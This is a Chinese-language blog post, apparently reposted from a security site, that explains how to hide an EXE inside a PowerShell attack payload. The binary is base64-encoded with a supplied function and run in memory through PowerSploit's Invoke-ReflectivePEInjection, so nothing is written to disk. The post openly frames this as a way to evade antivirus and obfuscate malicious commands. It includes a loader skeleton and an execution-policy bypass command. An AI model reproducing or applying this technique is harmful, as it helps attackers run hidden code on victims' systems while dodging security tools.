如何在PowerShell脚本中嵌入EXE文件?

《如何在PowerShell脚本中嵌入EXE文件?》要点：
本文介绍了如何在PowerShell脚本中嵌入EXE文件?，希望对您有用。如果有疑问，可以联系我们。

我在尝试解决一个问题,即在客户端攻击中只使用纯 PowerShell 脚本作为攻击负荷.使用 PowerShell 运行恶意代码具有很多优点,包括：

1.无需在目标上安装其他任何东西.

2.强大的引擎(例如可以直接调用 .NET 代码).

3.可以使用 base64 编码命令来混淆恶意命令,使恶意命令变的不容易被发现.这同样也是一种可以避免使用特殊字符的方法,尤其是在一个涉及多个步骤需要分离不同攻击负荷的高级攻击中.

4.可以使用Invoke-Expression将字符串解释为 Powershell 命令.从渗透测试的角度看,这可以避免在目标磁盘上编写复杂的脚本.例如：你可以使用 Powershell 下载额外的复杂脚本,然后通过调用 Invoke-Expression 解释并执行下载到内存中的脚本.这个过程同样可以躲避杀毒软件的查杀.

我们想在目标上运行一些相当复杂的功能,这些功能常是 EXE 文件的一部分.我不想直接在目标上放置一个二进制文件,因为这样可能会触发反病毒机制.所以我想将其放入 Powershell 脚本中,不过我也不想重写整个 Powershell 脚本.

最终我想到一个办法.

将二进制文件嵌入到 Powershell 脚本中,并直接通过脚本运行而不用将其写入到磁盘里.

下面演示解决步骤：

1.将二进制文件进行 base64 编码

可以使用以下函数：

function Convert-BinaryToString {

   [CmdletBinding()] param (

      [string] $FilePath

   )

   try {

      $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);

   }

   catch {

      throw "Failed to read file. Ensure that you have permission to the file,and that the file path is correct.";

   }

   if ($ByteArray) {

      $Base64String = [System.Convert]::ToBase64String($ByteArray);

   }

   else {

      throw '$ByteArray is $null.';

   }

   Write-Output -InputObject $Base64String;

}

2. 按如下过程创建一个新的脚本

1.用上一步的方法将 EXE 文件转为字符串；

2.准备 Invoke-ReflectivePEInjection(Powersploit project 的一部分)；

3.将字符串转为字节数组；

4.调用 Invoke-ReflectivePEInjection.

所以,二进制文件只是 Powershell 脚本中的一段字符串,在将字符串解码为二进制数组后,就可以调用 Invoke-ReflectivePEInjection 直接在内存中运行.

最后看起来像这样：

# base64 编码的二进制文件

$InputString = '...........'

function Invoke-ReflectivePEInjection

{

   ......
   ......
   ......

}

# 将二进制字符串转为字节数组

$PEBytes = [System.Convert]::FromBase64String($InputString)

# 在内存中运行 EXE

Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

现在就可以在目标上运行脚本了：

powershell -ExecutionPolicy Bypass -File payload.ps1

根据嵌入的不同二进制文件,可能会出现以下错误：

PE platform doesn’t match the architecture of the process it is being loaded in (32/64bit)

解决这个问题只需要运行 32 位的 PowerShell 即可.

下面是我将 plink.exe 嵌入 payload.ps1 的例子：

原文：truesecdev,来自FreeBuf黑客与极客.

（编辑：ASP站长网）